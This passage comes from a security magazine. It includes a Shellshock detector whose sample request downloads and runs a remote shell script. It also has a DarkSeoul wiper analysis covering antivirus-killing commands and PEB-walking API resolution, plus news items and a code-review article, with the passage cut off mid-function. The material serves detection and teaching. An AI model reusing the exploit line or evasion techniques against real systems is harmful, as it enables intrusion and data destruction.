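    "GET /cgi-bin/authLogin.cgi HTTP/1.1\r\n"
    "Host: 127.0.0.1\r\n"
    "User-Agent: () { :; }; /bin/rm -rf /tmp/S0.sh && /bin/mkdir -p /share/HDB_DATA/.../php "
    "&& /usr/bin/wget -c http://xxx.14.xx.xx/S0.sh -P /tmp && /bin/sh /tmp/S0.sh 0<&1 2>&1\r\n"
    "\r\n"
)
SAMPLE_REQUESTS = [
    {"method": "GET", "path": "/cgi-bin/authLogin.cgi",
     "headers": {"Host": "nas.example", "User-Agent": "Mozilla/5.0 (X11; Linux x86_64)"}},
    {"method": "GET", "path": "/",
     "headers": {"Host": "nas.example", "Cookie": "() { ignored; }; echo vulnerable"}},
]


def parse_raw_request(raw):
    """Split a raw HTTP/1.x request (as an IDS or honeypot stores it) into method, path, headers."""
    head = raw.split("\r\n\r\n", 1)[0]
    lines = head.split("\r\n")
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip()] = value.strip()
    return {"method": method, "path": path, "headers": headers}


def analyze_request(req):
    """Return None for a clean request, else indicators from the first header carrying the exploit."""
    for name, value in req["headers"].items():
        m = SHELLSHOCK_RE.search(value)
        if not m:
            continue
        cmd = m.group("cmd").strip()
        return {
            "header": name,
            "target": f'{req["method"]} {req["path"]}',
            "command": cmd,
            "urls": list(dict.fromkeys(URL_RE.findall(cmd))),
            "paths": list(dict.fromkeys(DROP_PATH_RE.findall(cmd))),
        }
    return None


def scan(requests):
    """Indicators for every exploit attempt in a batch of parsed requests."""
    return [hit for hit in map(analyze_request, requests) if hit]


if __name__ == "__main__":
    for hit in scan([parse_raw_request(SAMPLE_RAW)] + SAMPLE_REQUESTS):
        print(hit["target"], "via", hit["header"])
        print("   command:", hit["command"])
        print("   block:", hit["urls"], "hunt:", hit["paths"])
```

The detector looks at every header, not just User-Agent, because any header a CGI server copies into the environment (Cookie, Referer, Host) is an equally good carrier; the extracted URL is what to block at the egress, and the paths are what to look for on the NAS itself.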



New & News

News
A peek under the hood of the recent security breaches

ICANN has been hacked
The Internet Corporation for Assigned Names and Numbers has been hacked by unknown attackers, who gained access to some of the organization's systems. ICANN said spoofed emails pretending to be internal ICANN communications were sent to its staff members. The link in the emails took the staff to a bogus login page, where they provided their usernames and passwords, the keys to their work email accounts. "We believe a 'spear phishing' attack was initiated in late November 2014," Tuesday's press release stated. "It involved email messages that were crafted to appear to come from our own domain being sent to members of our staff. The attack resulted in the compromise of the email credentials of several ICANN staff members." According to ICANN, the hackers were able to successfully access a number of systems within ICANN, including the Centralized Zone Data System (CZDS), the wiki pages of the ICANN Governmental Advisory Committee (GAC), the domain registration Whois portal, and the ICANN blog.

BK Team


"Based on our investigation to date, we are not aware of any other systems that have been compromised, and we have confirmed that this attack does not impact any IANA-related systems," ICANN stated.


Google discloses three unpatched security vulnerabilities in Windows in less than one month

Google's Project Zero team has found three zero-day vulnerabilities in Windows. Project Zero often finds vulnerabilities in products from different companies; when the team finds one, it is reported to the affected software vendor with a 90-day deadline. After the 90 days pass, Google automatically discloses the vulnerability to the public.

The First Scenario
Google security researcher James Forshaw has discovered a privilege escalation vulnerability in Windows 8.1 that could allow an attacker to modify contents or even take over a victim's computer completely, leaving millions of users vulnerable.

The Second Scenario
According to Google's security team, the User Profile Service is used to create certain directories and mount the user hives as soon as a user logs into a computer. Other than loading the hives, the base profile directory is created under a privileged account, which is secure because a normal user would require administrator privileges to do so. "However there seems to be a bug in the way it handles impersonation, the first few resources in the profile get created under the user's token, but this changes to impersonating Local System part of the way through," Google said. "Any resources created while impersonating Local System might be exploitable to elevate privilege. Note that this occurs every time the user logs in to their account, it isn't something that only happens during the initial provisioning of the local profile."

The Third Scenario
The newly discovered bug resides in the CNG.sys implementation, which fails to run proper token checks. "The issue is the implementation in CNG.sys doesn't check the impersonation level of the token when capturing the logon session ID (using SeQueryAuthenticationIdToken) so a normal user can impersonate at Identification level and decrypt or encrypt data for that logon session," James Forshaw says in the post disclosing the vulnerability. "This behaviour of course might be design, however not having been party to the design it's hard to tell. The documentation states that the user must impersonate the client, which I read to mean it should be able to act on behalf of the client rather than identify as the client."
https://code.google.com/p/google-security-research/issues/detail?id=128

U.S. and U.K. have announced plans to stage cyber war games on each other

The United States and the U.K. will stage cyber "war games" together, starting this year, to boost both countries' resistance to cyberattacks, Britain's government said on 15 January. The two countries are planning a series of joint war games in which cyber-warriors from either side attack each other, to ramp up their cyber defences. The FBI and the National Security Agency will be involved, along with Britain's GCHQ and MI5 intelligence and security agencies. The two governments will simulate attacks on banks and the financial sector in London and the U.S. The U.K. said that there will be more exercises to test the resilience of national infrastructure. The two governments also plan to team up on a new program to train a new generation of "cyber agents," officials said. The program will fund students from both countries to research cybersecurity for up to six months and is expected to start in the academic year that begins in 2016. The closer cooperation to improve cybersecurity on both sides is due to concerns about vulnerabilities in the wake of the devastating cyber-attack on Sony Pictures, which the U.S. has blamed on North Korea and which led to the early release of a number of films and the publication of embarrassing private correspondence and personal data. In another incident, the Twitter and YouTube accounts of the U.S. military's Central Command were compromised by hackers claiming to support the Islamic State militant group.
http://www.bbc.com/news/uk-30842597

Chinese Hackers Stole F-35 Data – Snowden Leaks

Edward Snowden, a former NSA employee, has released a document that reveals an industrial-scale Chinese cyber-espionage operation to learn the secrets of Australia’s next front-line fighter aircraft, the US-built F-35 Joint Strike Fighter (JSF). Chinese spies allegedly stole as much as 50 terabytes of data, including details of the fighter’s radar systems, engine schematics, “aft deck heating contour maps,” designs to cool exhaust gases and the method the jet uses to track targets.

So far, the F-35 Lightning II JSF is the most expensive defense project in US history. The fighter aircraft, manufactured by US-based Lockheed Martin, was developed at a cost of around $400 billion (£230 billion), the BBC reports. The documents leaked by Snowden also revealed an NSA spying operation against China’s espionage agencies. According to the documents, the NSA hacked into the computer of a senior Chinese military official and stole information about Chinese intelligence targets in the US government and other foreign governments.

Emotet Malware Targets German Banking Users

A new variant in the Win32/Emotet family is targeting banking credentials with a new spam email campaign. The emails include fraudulent claims, such as fake phone bills and invoices from banks or PayPal, Microsoft says. The malware, identified as Emotet, was discovered by HeungSoo Kang of Microsoft’s Malware Protection Center. The center identified a sample spam email message written in German that included a link to a compromised website, which indicates that the campaign primarily targeted German-language speakers and banking websites. Emotet is able to pull credentials from a variety of email programs, including Outlook and Mozilla’s Thunderbird, and from instant messaging programs such as Yahoo Messenger and Windows Live Messenger. On infected machines, Emotet downloads a configuration file containing a list of banks and services it is designed to steal credentials from, and also downloads a file that intercepts and logs network traffic. All the stolen information is sent back to Emotet’s “command and control (C&C) server where it is used by other components to send spam emails to spread the threat,” Kang wrote. “We detect the Emotet spamming component as Spammer:Win32/Cetsiol.A.”

http://blogs.technet.com/b/mmpc/archive/2015/01/06/emotet-spam-campaign-targets-banking-credentials.aspx


New & News

Regional Cyber Security Summit 2015: Towards the Future of Cyber Attacks

The ITU Arab Regional Cyber Security Center is organizing the fourth Regional Cyber Security Summit in cooperation with Bluekaizen. The Information Technology Authority, through Oman National CERT (OCERT), hosts the summit on March 29th – 30th in Muscat, Oman. The last decade has seen a significant change in international security. The rapidly evolving cyber warfare techniques and emerging threats to government functions, industry, commerce, healthcare, social communication and personal information have created a whole new security environment that gets more dangerous over time. Preparing for future security threats has become inevitable; security tools and techniques must evolve to better protect data. The moment we think we are safe is the moment we are faced with irrefutable damages. The Regional Cyber Security Summit 2015 focuses on expected future threats and countermeasures. It also aims at connecting the public, private and academic sectors, with the main purpose of providing an appropriate platform for up to 200 senior ICT and cyber security officials from the MENA region to discuss and formulate strategic directions and plans to tackle emerging threats to the global and regional security sector.



New & News

Cairo Security Camp 2014: 5 years of sharing knowledge, 5 years of Success

The largest information security conference of its type in the Middle East and North Africa was held from 25th to 29th November 2014, gathering IT professionals and security practitioners from throughout the region in order to improve the information security field in the MENA region and to share different views on different information security topics. After 4 years of holding CSCAMP, the fourth edition, CSCAMP2014, was a little bit different. This year we increased the activities to include a Job Fair, the Security Kaizen Congress, Security Awards and others, beside two conference rooms: one only for technical sessions (the Security Kaizen Labs room) and the other for different security topics. And, as usual, a capture the flag (CTF) challenge.

BK Team



This year the conference included different discussion sessions covering different aspects of the information security domain, including malware analysis, forensics, advanced topics in security and case studies. A set of remarkable sessions on advanced topics and case studies were presented. One of them was presented by Omar Sherin, CIIP Manager at Q-CERT, discussing the technical challenges and active threats facing critical infrastructures in different countries through a small practical experiment. A unique session was presented by Tim Willis from Google about debugging the internet. Another advanced session, about mobile forensics, was covered by Adel Abdelmoneim and addressed the fundamentals of digital forensics with a special focus on mobile devices; through many practical examples, participants learned how to extract information (Facebook info, WhatsApp, SMS, images and EXIF information, etc.) from a suspect device. A special training was also held from 25th to 27th November on Advanced Android and iOS Hands-on Exploitation, covered by Aseem Jakhar, Director, Research, Payatu Technologies (http://payatu.com). This training took a deep dive into all the components of the Android operating system, starting right from ARM assembly, shellcoding, buffer overflows, OS security, the app security model and reverse engineering, to app security and exploitation.


Mr. Tim Willis


Another interesting topic was “The Usual Rants”, presented by Aseem Jakhar, focusing on simple issues that are plaguing the industry: common myths and old beliefs which need to change for a better and more secure enterprise world.

The CTF (Capture the Flag) was a major part of CSCAMP2014. The CTF contest was designed to serve as an educational exercise to give participants experience in securing a machine, as well as in conducting and reacting to the sort of attacks found in the real world. Reverse engineering, network sniffing, protocol analysis, system administration, programming and cryptanalysis are all skills which have been required by prior CTF contests at Cairo Security Camp.

Pre-qualification was based on 4 levels that CTF players were able to proceed through within a time frame of 3 days. The challenges were divided into the following types:
1. Web
2. Exploitation
3. Reversing
4. Bonus round
Two teams played in the final round at Cairo Security Camp. The winning team was balalaika cr3w with a score of 2100 points, and the runner-up was Null with 1050 points.

Mr. Aseem Jakhar

A new set of sessions was introduced at this year’s conference, covering The Security Challenge Facing Banking Electronic Channels, introduced by Osama Hiji, and Anatomy of the Financial Malware, presented by Dr. Ahmed Shosha.

In conclusion, this year’s conference was unique in the variety of topics covered, especially financial malware; the innovative techniques in threat analysis and forensics were very interesting, introducing hands-on work and the efforts done in threat analysis and forensics. Case studies and best practices were also introduced and, as every year, the advanced topics and debate sessions open new aspects for infosec specialists in Egypt and the Arab world.

balalaika cr3w team


Reviews

Malware Review

Win32:DarkSeoul-C Trojan.Win32.EraseMBR.b

Executive Summary: This malware deletes the MBR from the hard drives connected to the system, and it deletes files and folders on Windows versions newer than XP. The malware doesn’t modify the registry to achieve persistence, as the infected machine won’t survive the next reboot. There are no network activities.

AbdELRahman Hesham

ITI Cyber Security Student



Identification

MD5: 0a8032cd6b4a710b1771a080fa09fb87
SHA256: 510f83af3c41f9892040a8a80b4f3a4736eebee2ec4a7d4bfee63dbe44d7ecff
Detection ratio: 49 / 56 (VirusTotal)

Static analysis

The sample imports only two DLLs (kernel32, ntdll). These are mandatory libraries loaded by most executables and don’t give a hint about the functionality of the sample. But the kernel32 library contains functions that allow any executable to load libraries that are not in the import table: LoadLibrary and GetProcAddress. The technique works as follows:
1. First the executable passes the name of the required library as an argument to the LoadLibrary function, which returns a handle to the loaded module if it succeeds.
2. When the library is successfully loaded in memory, the executable calls the GetProcAddress function with the module handle and the name of the required function in the loaded library as arguments.
3. The executable can then call the function using the address returned by GetProcAddress.
This technique is used to hide the functionality of the malware, as it cannot be seen during static analysis, especially if the names of the library and the function are obfuscated or encrypted.

Dynamic analysis

The code starts with unusual, non-malicious code: the third instruction calls the fourth instruction, and the return address saved by the call, which is the address of the fourth instruction, is put in EAX. The code then enters a loop to calculate some addresses and store them in memory (calculating the addresses at runtime hides information from static analysis, as the addresses called are not known until the sample is running). The sample calculates 27 addresses and stores them in memory starting from location 004026CC. The code then calls one of the 27 addresses (004023A0).

This function accesses the FS segment register to reach the TEB. The TEB is the Thread Environment Block, which contains information about the currently running thread. The structure of the TEB is not documented by Microsoft; nevertheless the information we need is available online [http://www.nirsoft.net/kernel_struct/vista/TEB.html]. The function accesses offset 0x30 in the TEB, so we need to know what is at this offset:
- The first member is a struct (NT_TIB). This struct contains 6 pointers (every data type starting with P is a pointer). Pointers in 32-bit executables have a size of 4 bytes. It also contains a union; unions allocate the size of their biggest member, and this one contains an unsigned long and a pointer, both of size 4 bytes. So the total size of the NT_TIB struct is 7 * 4 = 28 bytes.
- Then there are another 5 pointers (two inside the CLIENT_ID structure), of size 5 * 4 = 20 bytes.
20 + 28 = 48 bytes (0x30). So offset 0x30 in the TEB is the PEB, according to the unofficial documentation. The function then accesses offset 0x0C in the PEB structure (documentation of the structure can be found here). The member at offset 0x0C is PPEB_LDR_DATA, a pointer to a PEB_LDR_DATA structure. Then offset 0x14 in PEB_LDR_DATA is InMemoryOrderModuleList, a linked list of LDR_DATA_TABLE_ENTRY elements. Offset 28 in this structure is not documented, but it seems that it gets the name of the loaded module. Then there is a loop that processes the module name to calculate a hash value, which is compared with a hardcoded value after the loop. This loop searches for the entry point of kernel32.dll (the calculated value matches the hardcoded value), and then the function returns this address. Then the function at 0x004023DD is called twice to find the addresses of the LoadLibraryA and GetProcAddress functions. Then it loads DLLs using the LoadLibraryA function and finds the addresses of the following functions using the function at 0x004023DD:
1. advapi32.OpenProcessToken
2. advapi32.LookupPrivilegeValueA
3. advapi32.AdjustTokenPrivileges
4. kernel32.OpenFileMappingA
5. kernel32.CreateFileMappingA
6. kernel32.GetWindowsDirectoryA
7. kernel32.InitializeCriticalSection
8. kernel32.CreateThread
9. kernel32.WaitForSingleObject
10. ntdll.RtlLeaveCriticalSection
11. kernel32.GetVersionExA
12. kernel32.Sleep
13. kernel32.GetDriveTypeA
14. ntdll.RtlEnterCriticalSection
15. kernel32.FindFirstFileA
16. kernel32.RemoveDirectoryA
17. kernel32.FindNextFileA
18. kernel32.FindClose
19. kernel32.CreateFileA
20. kernel32.WriteFile
21. kernel32.CloseHandle
22. kernel32.DeleteFileA
23. kernel32.SetFilePointer
24. kernel32.GetSystemDirectoryA
25. kernel32.GetDiskFreeSpaceA
26. kernel32.GetDiskFreeSpaceExA
27. kernel32.ReadFile
28. kernel32.WinExec
29. kernel32.GetCurrentProcess
30. ntdll.RtlGetLastWin32Error
31. kernel32.LoadLibraryA
32. kernel32.GetProcAddress
Then it loads msvcrt.dll:
1. msvcrt.strcat
2. msvcrt.memset
3. msvcrt.strcpy
4. msvcrt.memcpy
5. msvcrt.strlen
6. msvcrt.sprintf
7. msvcrt.strcmp
8. msvcrt.malloc
9. msvcrt.free
Then user32.dll:
1. user32.ExitWindowsEx
The function starting at 0x004011BC tries to open a file mapping object named “JO840112-CRAS8468-11150923-PCI8273V”; if it is found, the malware exits. If it doesn’t find the file mapping object, it creates one. Then the malware passes the following commands to kernel32.WinExec to be executed on the system:
a. taskkill /F /IM pasvc.exe, which belongs to http://us.ahnlab.com/
b. taskkill /F /IM clisvc.exe, which belongs to ViRobot ISMS from HAURI
The function call at 00401242 checks the version of the Windows system: if it is older than Windows Vista (Windows XP, Windows 2003 or older), the malware creates a thread that starts execution at 0x00401AA0; otherwise it starts execution at 0x004012D5.
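To check the offset arithmetic above, and to show why the dynamic-resolution technique from the static analysis section leaves nothing in the import table, here is an added example (not code from the review or from the sample): it models the 32-bit structures with ctypes, derives the 0x30, 0x0C and 0x14 offsets, and walks the same chain over a constructed memory image to list module names the way the sample does before hashing them. The TEB layout follows the unofficial Vista page cited above; the PEB, PEB_LDR_DATA and LDR_DATA_TABLE_ENTRY layouts are the public 32-bit ones, under which the undocumented offset 0x28 the review mentions is BaseDllName.Buffer measured from InMemoryOrderLinks.

```python
import ctypes

P32 = ctypes.c_uint32   # a pointer in a 32-bit process: 4 bytes regardless of the host
ULONG, USHORT, UCHAR = ctypes.c_uint32, ctypes.c_uint16, ctypes.c_ubyte


class FiberUnion(ctypes.Union):           # union { PVOID FiberData; ULONG Version; }
    _fields_ = [("FiberData", P32), ("Version", ULONG)]

class NT_TIB(ctypes.Structure):           # 6 pointers + 1 union = 7 * 4 = 28 bytes
    _fields_ = [("ExceptionList", P32), ("StackBase", P32), ("StackLimit", P32),
                ("SubSystemTib", P32), ("u", FiberUnion),
                ("ArbitraryUserPointer", P32), ("Self", P32)]

class CLIENT_ID(ctypes.Structure):
    _fields_ = [("UniqueProcess", P32), ("UniqueThread", P32)]

class TEB32(ctypes.Structure):            # leading members only (unofficial Vista layout)
    _fields_ = [("NtTib", NT_TIB), ("EnvironmentPointer", P32), ("ClientId", CLIENT_ID),
                ("ActiveRpcHandle", P32), ("ThreadLocalStoragePointer", P32),
                ("ProcessEnvironmentBlock", P32)]

class PEB32(ctypes.Structure):            # leading members only
    _fields_ = [("InheritedAddressSpace", UCHAR), ("ReadImageFileExecOptions", UCHAR),
                ("BeingDebugged", UCHAR), ("BitField", UCHAR), ("Mutant", P32),
                ("ImageBaseAddress", P32), ("Ldr", P32)]

class LIST_ENTRY32(ctypes.Structure):
    _fields_ = [("Flink", P32), ("Blink", P32)]

class PEB_LDR_DATA32(ctypes.Structure):   # Initialized is padded to 4 bytes before SsHandle
    _fields_ = [("Length", ULONG), ("Initialized", UCHAR), ("SsHandle", P32),
                ("InLoadOrderModuleList", LIST_ENTRY32),
                ("InMemoryOrderModuleList", LIST_ENTRY32)]

class UNICODE_STRING32(ctypes.Structure):
    _fields_ = [("Length", USHORT), ("MaximumLength", USHORT), ("Buffer", P32)]

class LDR_DATA_TABLE_ENTRY32(ctypes.Structure):   # leading members only
    _fields_ = [("InLoadOrderLinks", LIST_ENTRY32), ("InMemoryOrderLinks", LIST_ENTRY32),
                ("InInitializationOrderLinks", LIST_ENTRY32), ("DllBase", P32),
                ("EntryPoint", P32), ("SizeOfImage", ULONG),
                ("FullDllName", UNICODE_STRING32), ("BaseDllName", UNICODE_STRING32)]

LINKS = LDR_DATA_TABLE_ENTRY32.InMemoryOrderLinks.offset          # 0x08 inside an entry
NAME_BUF = (LDR_DATA_TABLE_ENTRY32.BaseDllName.offset
            + UNICODE_STRING32.Buffer.offset - LINKS)              # 0x28 from the links


def offsets():
    """The offsets the reviewed function dereferences, derived from the layouts above."""
    return {
        "sizeof(NT_TIB)": ctypes.sizeof(NT_TIB),                               # 28
        "TEB.ProcessEnvironmentBlock": TEB32.ProcessEnvironmentBlock.offset,   # 0x30
        "PEB.Ldr": PEB32.Ldr.offset,                                            # 0x0C
        "PEB_LDR_DATA.InMemoryOrderModuleList":
            PEB_LDR_DATA32.InMemoryOrderModuleList.offset,                      # 0x14
        "BaseDllName.Buffer from InMemoryOrderLinks": NAME_BUF,                 # 0x28
    }


def build_fake_memory():
    """Constructed flat 32-bit image (no real process is touched): TEB at 0x1000, PEB at
    0x2000, PEB_LDR_DATA at 0x3000, two LDR_DATA_TABLE_ENTRY records at 0x4000/0x5000."""
    mem = bytearray(0x6000)

    def place(addr, obj):
        mem[addr:addr + ctypes.sizeof(obj)] = bytes(obj)

    def entry(addr, name, buf, next_links):
        e = LDR_DATA_TABLE_ENTRY32()
        e.InMemoryOrderLinks.Flink = next_links
        e.BaseDllName.Length, e.BaseDllName.Buffer = 2 * len(name), buf
        place(addr, e)
        mem[buf:buf + 2 * len(name)] = name.encode("utf-16-le")

    head = 0x3000 + PEB_LDR_DATA32.InMemoryOrderModuleList.offset
    ldr = PEB_LDR_DATA32()
    ldr.InMemoryOrderModuleList.Flink = 0x4000 + LINKS
    place(0x3000, ldr)
    entry(0x4000, "sample.exe", 0x4100, 0x5000 + LINKS)
    entry(0x5000, "KERNEL32.DLL", 0x5100, head)   # last entry links back to the list head
    peb = PEB32(); peb.Ldr = 0x3000; place(0x2000, peb)
    teb = TEB32(); teb.ProcessEnvironmentBlock = 0x2000; place(0x1000, teb)
    return bytes(mem)


def walk_modules(mem, teb_addr=0x1000):
    """fs:[0x30] -> [peb+0x0C] -> ldr+0x14 -> each entry's BaseDllName: the chain the
    sample walks (hashing each name) to locate kernel32 without any import."""
    rd32 = lambda a: int.from_bytes(mem[a:a + 4], "little")
    rd16 = lambda a: int.from_bytes(mem[a:a + 2], "little")
    peb = rd32(teb_addr + TEB32.ProcessEnvironmentBlock.offset)
    ldr = rd32(peb + PEB32.Ldr.offset)
    head = ldr + PEB_LDR_DATA32.InMemoryOrderModuleList.offset
    names, links = [], rd32(head)                 # Flink of the list head
    while links != head:
        buf = rd32(links + NAME_BUF)
        length = rd16(links + NAME_BUF - 4)       # BaseDllName.Length precedes Buffer
        names.append(mem[buf:buf + length].decode("utf-16-le"))
        links = rd32(links)                       # this entry's InMemoryOrderLinks.Flink
    return names
```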


On Windows XP: the function call at 00401d85 clears a buffer of size 0x104 bytes and then stores the string “\\.\PhysicalDrive0” in the buffer. It then opens the file \\.\PhysicalDrive0 and uses the kernel32.SetFilePointer function to point to the start of the drive; it reads 512 bytes into a buffer in the heap and then uses SetFilePointer() to advance the file pointer by 0x7000 bytes. Then it writes 512 bytes of the word “PR!NCPESP”, and then sets the file pointer to the beginning of the physical drive and again writes 512 bytes of the word “PR!NCPESP”. It loops to do the same on PhysicalDrive1 to PhysicalDrive9. The malware then sleeps for 5 minutes and shuts down the operating system for the last time.

On operating systems newer than Windows XP (Windows 7, for example) the malware creates another thread after destroying the MBR. This thread is responsible for deleting files and folders on the hard drive, and works as follows:
1. It loops to check all drives from B:\ to Y:\. If the drive exists, it performs another check to see whether it is the drive that contains the operating system or not.
a. If it contains the operating system, it stores the drive path for use after the current loop.
b. If it is not the operating system drive, it processes the drive in the loop.
2. The processing of valid drives is the same for the drive that contains the operating system and the other valid drives; the only difference is that the malware creates a new thread for every other valid drive and processes the drive that contains the operating system on the current thread.
3. The processing done on drives (function at address 0x004015ED) is that the malware traverses the folders in the drive using the FindNextFile() function, appending *.* to the current directory path.
4. It overwrites the content of every file with the word “PR!NCPESP” multiple times, and then deletes the file, making file recovery impossible.
5. It avoids deleting files in c:/program files, c:/program data and c:/windows.
6. It creates a thread for deep paths (3 nested folders).
After five minutes the malware shuts down the PC using the following methods:
1. kernel32.WinExec(“shutdown -r -t 0”)
2. user32.ExitWindowsEx()
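An added forensic check, not part of the review: given the raw bytes of a drive image it reports whether sector 0 and the sector at 0x7000 are filled with the repeated marker and whether the 0x55AA boot signature survives, and the same marker test can be applied to carved file content from the wiping thread. The review does not state the exact tiling of the 512 marker bytes, so the check uses a coverage threshold rather than an exact pattern; both images below are constructed.

```python
MARKER = b"PR!NCPESP"          # the string the sample writes, per the review
SECTOR = 512
SECOND_OFFSET = 0x7000         # second location the sample writes on each physical drive


def marker_fill_ratio(block: bytes, marker: bytes = MARKER) -> float:
    """Fraction of the block covered by non-overlapping copies of the marker."""
    if not block:
        return 0.0
    return block.count(marker) * len(marker) / len(block)


def is_marker_filled(block: bytes, threshold: float = 0.9) -> bool:
    """True when the block is essentially the marker repeated; a partial trailing copy
    and a few stray bytes are tolerated (assumption: the exact tiling is unknown)."""
    return marker_fill_ratio(block) >= threshold


def has_boot_signature(sector: bytes) -> bool:
    """A valid MBR ends in the 0x55 0xAA signature at bytes 510-511."""
    return len(sector) >= SECTOR and sector[510:512] == b"\x55\xaa"


def inspect_image(image: bytes) -> dict:
    """Report the wiper's footprint on a raw drive image."""
    mbr = image[0:SECTOR]
    second = image[SECOND_OFFSET:SECOND_OFFSET + SECTOR]
    return {
        "mbr_marker_filled": is_marker_filled(mbr),
        "boot_signature_present": has_boot_signature(mbr),
        "sector_0x7000_marker_filled": is_marker_filled(second),
    }


def clean_image() -> bytes:
    """Constructed sample: dummy boot code plus a valid signature, nothing at 0x7000."""
    img = bytearray(SECOND_OFFSET + SECTOR)
    img[0:4] = b"\x33\xc0\x8e\xd0"          # arbitrary code bytes, constructed
    img[510:512] = b"\x55\xaa"
    return bytes(img)


def wiped_image() -> bytes:
    """Constructed sample reproducing the described write order: 512 bytes of the
    marker at 0x7000, then 512 bytes of the marker over sector 0."""
    img = bytearray(clean_image())
    fill = (MARKER * (SECTOR // len(MARKER) + 1))[:SECTOR]
    img[SECOND_OFFSET:SECOND_OFFSET + SECTOR] = fill
    img[0:SECTOR] = fill
    return bytes(img)
```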



Reviews

Code Review

Manual Source Code Review Overview

Shaikh Rashid

Cyber Security Consultant and Security Researcher

Finding vulnerabilities in any application is a daunting task for security researchers, who are increasingly engaging with different approaches and methodologies to hunt down vulnerabilities. Some of the common approaches or methodologies are black box testing and white box testing. The black box testing approach is when the researcher doesn’t have any working knowledge or background of the application; they have to enumerate technologies, map the application, identify fault entry points and determine input validation vulnerabilities or logical security vulnerabilities. White box testing involves having the source code of the application and a proper understanding of the application as well as its purpose, background, environment and framework, to best identify key areas of focus. In software development, a small coding error can result in a critical vulnerability that ends up compromising the security of an entire system or network. Source code review is probably the single most effective technique for identifying security flaws. When used together with automated tools and manual penetration testing, code review can significantly increase the cost effectiveness of an application security verification effort. This task can be carried out either by commercial or free automated tools, or by manual review of the code, which requires human interaction.


Introduction: Manual source code review provides insight into the “real risk” associated with insecure code. This is the single most important value of a manual approach. A human reviewer can understand the context of certain coding practices and make a serious risk estimate that accounts for both the likelihood of attack and the business impact of a breach. Manual source code review is a time-consuming process, but this lengthy process can be shortened if we know properly which areas to investigate. Although many tools are available, proper knowledge of manual code review is still required.

Basics: The first and foremost requirement of code review is that you should have a basic understanding of at least one object-oriented framework, i.e. J2EE or .NET. Knowledge of PHP is also fine.

Application Details

The next and most important step is to understand how the application works and what its settings are. Therefore the entry point of a code review is the deployment descriptor (web.xml in J2EE, web.config in .NET). In web service testing it is very important to understand the application: what is it doing, what are the business requirements? Analyze the behavior of the application. Have an idea of the data flow. Explore the application and mine out important details such as the APIs and libraries used. Note: in PHP there is no configuration file present if no framework is used.

Following is the checklist for code review:
•Authentication & Authorization
•Cryptography
•Respecting boundaries (input validation & output encoding)
•Session management
•Threat Modeling

Terminology
Following is the terminology which a code reviewer should be aware of:
•Trust zone: the user of the application
•Taint: user-provided malicious data
•Taint propagator: a function that takes malicious data as input and passes it on without validation
•Source: the point where malicious input was given, e.g. request.getParameter() is a source
•Sink: the place where the vulnerability gets executed, for example the place where XSS alerts get reflected

1. Configuration Management
Study the configuration file (deployment descriptor) properly; it will tell you a lot about the deployment. For example, if you want to see what HTTP methods are used, you can see it in web.xml. web.xml is present in WEB-INF; on viewing it we found the setting shown in Figure 2.

Figure 2: Use of dangerous HTTP methods

2. Check Whether Custom Error Pages are Defined
If the application developer wants, he can set a custom error page for an error code in web.xml, as shown in Figure 1.

Figure 1: Use of custom pages for error code 404

3. Listing of HTTP Methods Enabled
Under the http-method tag you can see the methods enabled (refer to Figure 2).

Remediation: Provide a custom error page to avoid leakage of sensitive information. Disable dangerous HTTP methods. Use only the GET and POST methods to be on the safer side.

4. Data Protection in Storage & Transit
The setting in Figure 3 shows that the transport guarantee is NONE, which means that there is no HTTPS setting provided in the application. So anybody can intercept the communication.

Figure 3: Transport-guarantee not set properly

Remediation: The setting for transport-guarantee should be CONFIDENTIAL, as shown in Figure 4.


Figure 4: Transport-guarantee setting should be CONFIDENTIAL

5. Hashing of Password
A weak hashing algorithm, SHA1, was used for the password. If you look at the code shown in Figure 5 it seems there is encryption of the password, but on opening up the definition of the encrypt method of the crypto class (Figure 6) we can see that hashing of the password is done using SHA, but which SHA algorithm is used is not known.

Figure 5: SafePass variable storing encrypted value of password

If “SHA” is given to MessageDigest.getInstance, it uses SHA1 by default; the same is happening in this case, refer to Figure 6. SHA1 is a weak hashing algorithm.

Figure 6: SHA for password hash

Remediation: A strong hashing algorithm should be used to store passwords in hashed form. There should be proper salting of the hashed data, and the salt used should be different for different users. If you are using some encryption algorithm, it should be strong enough. In coming years, if computing resources become cheaper, it may become possible to crack the encryption. Therefore, to delay an attacker from decrypting your data, you can increase the number of iterations of the encryption algorithm.

6. Hard Coded Password
Case: sometimes developers put a hardcoded password in a JSP page as a comment. In Figure 7 the first comment (marked in red as 1) is a JSP comment and the other is an HTML comment (marked as 2). The HT ML comment is visible on the web page (since it is a JSP page, HTML comments won’t work as comments). Even the JSP comments can be viewed by viewing the source.

Figure 7: Password hard coded as comment

7. Authorization
The case of CSRF (bypassing authorization): ‘My profile is better than yours because I have updated it’. Sometimes developers have the wrong notion that sending parameters or the session token as a hidden field, or obscuring them with programming terminology, would save them from the eyes of an attacker. An example of this is depicted in Figure 8.

Figure 8: ‘User ID’ passed as hidden parameter.

There is code for updating accounts, as shown in Figure 9.

Figure 9: Code for updating profile

The code in Figure 9 updates an account on the basis of ‘userid’, a crucial parameter passed as a hidden parameter. This coding flaw can be used by an attacker who makes his own webpage having the same update action as that of the application; he will also have the victim’s session ID, which would update the profile of the victim. The cause of this attack is a weak authorization process, which is updating data on the basis of a parameter without validating whether the parameter is coming from a legitimate user or not.

Remediation: Use tokens which would help the server in identifying its client. In Spring Framework 3.0 there is a token-based remedy for CSRF.
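For the password-hashing finding (item 5), an added example of the remediation written in Python (not the reviewed application’s Java code): the unsalted SHA-1 “before” beside PBKDF2-HMAC-SHA256 with a per-user random salt and a stored iteration count that can be raised later. The iteration count and salt length are illustrative choices, not values from the article.

```python
import hashlib
import hmac
import os

ITERATIONS = 200_000   # illustrative policy value; raise it as hardware gets cheaper
SALT_BYTES = 16


def weak_hash(password: str) -> str:
    """What the reviewed encrypt() amounts to: unsalted SHA-1. Two users with the same
    password get the same value, and one fast hash per guess is all an attacker needs."""
    return hashlib.sha1(password.encode("utf-8")).hexdigest()


def hash_password(password: str, iterations: int = ITERATIONS, salt=None) -> str:
    """Salted, iterated PBKDF2-HMAC-SHA256. The stored record carries the algorithm,
    the iteration count and the salt, so the cost can be raised for new records without
    breaking verification of old ones."""
    salt = os.urandom(SALT_BYTES) if salt is None else salt
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
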